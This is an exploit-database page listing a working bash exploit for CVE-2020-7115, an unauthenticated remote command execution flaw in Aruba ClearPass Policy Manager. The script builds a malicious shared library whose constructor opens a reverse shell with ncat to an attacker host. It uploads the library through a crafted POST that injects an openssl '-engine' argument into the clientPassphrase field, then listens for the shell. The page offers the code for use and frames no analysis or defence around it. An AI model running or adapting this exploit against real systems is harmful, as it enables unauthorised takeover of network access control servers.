[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ClearPass Policy Manager Unauthenticated Remote Command Execution Exploit

Author
spicyitalian
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-34655
Category
remote exploits
Date add
08-07-2020
CVE
CVE-2020-7115
Platform
multiple
#!/usr/bin/env bash
# ClearPass Policy Manager Unauthenticated Remote Command Execution in the WebUI (CVE-2020-7115)
# For best results use OpenSSL/libcrypto shipped with RHEL/CentOS 7.x.
# Questions? Contact spicyitalian@protonmail.com.

if [ "$#" -ne 4 ]; then
  echo "Usage: `basename $0` [remote host] [remote port] [local host] [local port]"
  exit 0
fi

cat <<EOF >>payload.c
#include <unistd.h>

__attribute__((constructor))
static void init() {
    execl("/bin/sh", "sh", "-c", "rm -f /tmp/clientCertFile*.txt ; sleep 1 ; ncat $3 $4 -e /bin/sh", NULL);
}
EOF

gcc -fPIC -c payload.c
gcc -shared -o payload.so -lcrypto payload.o
rm -f payload.c payload.o

curl -X POST -F 'clientPassphrase=req -engine /tmp/clientCertFile*.txt' -F 'uploadClientCertFile=@./payload.so' -k https://$1:$2/tips/tipsSimulationUpload.action &>/dev/null &

ncat -v -l $3 $4

#  0day.today [2024-12-24]  #